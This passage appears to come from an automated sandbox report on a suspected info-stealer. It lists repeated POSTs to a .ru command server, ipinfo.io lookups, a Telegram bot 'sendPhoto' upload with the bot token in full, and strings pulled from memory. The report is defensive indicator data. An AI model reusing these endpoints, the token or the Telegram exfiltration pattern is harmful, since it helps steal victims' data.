                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 1836Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 1856Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 1856Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 1856Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 1856Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /country HTTP/1.1Host: ipinfo.io
                              Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /country HTTP/1.1Host: ipinfo.io
                              Source: global trafficDNS traffic detected: DNS query: ipinfo.io
                              Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                              Source: global trafficDNS traffic detected: DNS query: 525833cm.nyashnyash.ru
                              Source: unknownHTTP traffic detected: POST /bot7770813070:AAGqpOsmZAapb-pBsZQmM7BGLhdVdYw-7FQ/sendPhoto HTTP/1.1Content-Type: multipart/form-data; boundary="313b427a-59e5-4849-a91a-75e00f68a976"Host: api.telegram.orgContent-Length: 82628Expect: 100-continueConnection: Keep-Alive
                              Source: VQdUvAQ4xO.exe, 00000000.00000002.1853838572.0000000003315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                              Source: svchost.exe, 0000001F.00000003.1986455209.000001EE46218000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.31.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                              Source: svchost.exe, 0000001F.00000003.1986455209.000001EE46218000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
                              Source: qmgr.db.31.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                              Source: qmgr.db.31.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                              Source: svchost.exe, 0000001F.00000003.1986455209.000001EE46218000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.31.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                              Source: svchost.exe, 0000001F.00000003.1986455209.000001EE46218000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.31.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                              Source: svchost.exe, 0000001F.00000003.1986455209.000001EE4624D000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.31.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                              Source: qmgr.db.31.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                              Source: VQdUvAQ4xO.exe, 00000000.00000002.1853838572.000000000324C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ipinfo.io
                              Source: powershell.exe, 00000004.00000002.3359158340.00000218E52E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3375021893.0000021B53196000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3420318873.00000203E2456000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.3163423208.000001B610076000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3422861033.000001EAE8F76000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                              Source: powershell.exe, 0000000D.00000002.1995438004.000001EAD9152000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                              Source: powershell.exe, 00000004.00000002.1984514028.00000218D549A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1991340616.00000165E46F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1976313448.0000021B43348000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1987379525.00000203D2609000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1968295093.000001B600228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1995438004.000001EAD9152000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                              Source: VQdUvAQ4xO.exe, 00000000.00000002.1853838572.0000000002BD7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1984514028.00000218D5271000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1991340616.00000165E44D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1976313448.0000021B43121000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1987379525.00000203D23E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1968295093.000001B600001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1995438004.000001EAD8F01000.00000004.00000800.00020000.00000000.sdmp, tNOtXAG6xwxcUNu9tjBa.exe, 00000014.00000002.1941428206.0000000002A55000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                              Source: powershell.exe, 00000004.00000002.1984514028.00000218D549A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1991340616.00000165E46F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1976313448.0000021B43348000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1987379525.00000203D2609000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1968295093.000001B600228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1995438004.000001EAD9152000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                              Source: powershell.exe, 0000000D.00000002.1995438004.000001EAD9152000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                              Source: 4WuxfupWij.29.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                              Source: powershell.exe, 00000004.00000002.1984514028.00000218D5271000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1991340616.00000165E44D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1976313448.0000021B43121000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1987379525.00000203D23E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1968295093.000001B600001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1995438004.000001EAD8F01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                              Source: VQdUvAQ4xO.exe, 00000000.00000002.1853838572.00000000032CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                              Source: VQdUvAQ4xO.exe, 00000000.00000002.1853838572.00000000032CA000.00000004.00000800.00020000.00000000.sdmp, VQdUvAQ4xO.exe, 00000000.00000002.1853676622.0000000002972000.00000002.00000001.01000000.00000000.sdmp, tNOtXAG6xwxcUNu9tjBa.exe, 00000014.00000002.1941428206.0000000002687000.00000004.00000800.00020000.00000000.sdmp, tNOtXAG6xwxcUNu9tjBa.exe, 00000014.00000002.1941428206.0000000002D90000.00000004.00000800.00020000.00000000.sdmp, tNOtXAG6xwxcUNu9tjBa.exe, 00000014.00000002.1941428206.0000000002D7A000.00000004.00000800.00020000.00000000.sdmp, tNOtXAG6xwxcUNu9tjBa.exe, 00000014.00000002.1941428206.0000000002C47000.00000004.00000800.00020000.00000000.sdmp, eTZddqfc.log.20.drString found in binary or memory: https://api.telegram.org/bot
                              Source: VQdUvAQ4xO.exe, 00000000.00000002.1853838572.00000000032CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7770813070:AAGqpOsmZAapb-pBsZQmM7BGLhdVdYw-7FQ/sendPhotoX
                              Source: 4WuxfupWij.29.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                              Source: 4WuxfupWij.29.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                              Source: 4WuxfupWij.29.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                              Source: powershell.exe, 0000000D.00000002.3422861033.000001EAE8F76000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                              Source: powershell.exe, 0000000D.00000002.3422861033.000001EAE8F76000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                              Source: powershell.exe, 0000000D.00000002.3422861033.000001EAE8F76000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                              Source: 4WuxfupWij.29.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                              Source: 4WuxfupWij.29.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                              Source: 4WuxfupWij.29.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                              Source: qmgr.db.31.drString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
                              Source: svchost.exe, 0000001F.00000003.1986455209.000001EE46256000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.31.drString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
                              Source: qmgr.db.31.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
                              Source: svchost.exe, 0000001F.00000003.1986455209.000001EE462A3000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.31.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                              Source: powershell.exe, 0000000D.00000002.1995438004.000001EAD9152000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                              Source: VQdUvAQ4xO.exe, 00000000.00000002.1853838572.0000000003271000.00000004.00000800.00020000.00000000.sdmp, VQdUvAQ4xO.exe, 00000000.00000002.1853838572.0000000003231000.00000004.00000800.00020000.00000000.sdmp, VQdUvAQ4xO.exe, 00000000.00000002.1853838572.0000000003247000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io
                              Source: VQdUvAQ4xO.exe, 00000000.00000002.1853676622.0000000002972000.00000002.00000001.01000000.00000000.sdmp, VQdUvAQ4xO.exe, 00000000.00000002.1853838572.0000000003231000.00000004.00000800.00020000.00000000.sdmp, tNOtXAG6xwxcUNu9tjBa.exe, 00000014.00000002.1941428206.0000000002687000.00000004.00000800.00020000.00000000.sdmp, tNOtXAG6xwxcUNu9tjBa.exe, 00000014.00000002.1941428206.0000000002D90000.00000004.00000800.00020000.00000000.sdmp, tNOtXAG6xwxcUNu9tjBa.exe, 00000014.00000002.1941428206.0000000002D7A000.00000004.00000800.00020000.00000000.sdmp, tNOtXAG6xwxcUNu9tjBa.exe, 00000014.00000002.1941428206.0000000002C47000.00000004.00000800.00020000.00000000.sdmp, eTZddqfc.log.20.drString found in binary or memory: https://ipinfo.io/country
